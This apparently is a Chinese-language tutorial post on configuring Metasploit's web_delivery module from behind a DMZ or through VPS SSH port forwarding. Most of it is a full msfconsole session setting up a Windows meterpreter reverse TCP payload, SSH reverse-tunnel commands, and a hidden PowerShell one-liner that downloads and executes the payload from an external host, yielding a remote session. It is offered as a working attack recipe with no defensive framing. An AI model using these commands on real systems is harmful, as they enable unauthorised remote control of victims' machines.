DMZ下使用web_delivery 介绍

之前碰到的问题，自己的主机做了DMZ，设置[b]web_delivery[/b]时，发现将lhost设置成外网ip，则脚本不能运行，如果设置成内网ip，则反弹payload反弹的地址为内网地址，即不可能获取到会话，查看详细配置信息，发现存在reverselistenerbindaddress 设置选项，解决了此问题，当然，此参数也适用于用vps转发端口使用本地msf的情况。详细配置如下：

使用vps转发 8081 端口到本地8081端口 (web_delivery服务端口)

复制

ssh -N -R 8081:ip:8081 user@ip

使用vps转发 6666 端口到本地6666端口 （web_delivery payload 监听端口）

复制

ssh -N -R 6666:ip:6666 user@ip

msf开启并配置web_delivery

复制

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set URIPATH /
URIPATH => /
msf exploit(web_delivery) > set lhost ip  #外网ip地址
lhost => ip
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set reverselistenerbindaddress 192.168.2.100 #内网ip地址
reverselistenerbindaddress => 192.168.2.100
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.2.100:6666
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.2.100:8081/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

客户端执行：
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

内网msf获取meterpreter会话。

DMZ情形下，不需要做端口转发，只需要把lhost设置为外网ip地址，reverselistenerbindaddress 设置为内网ip地址即可。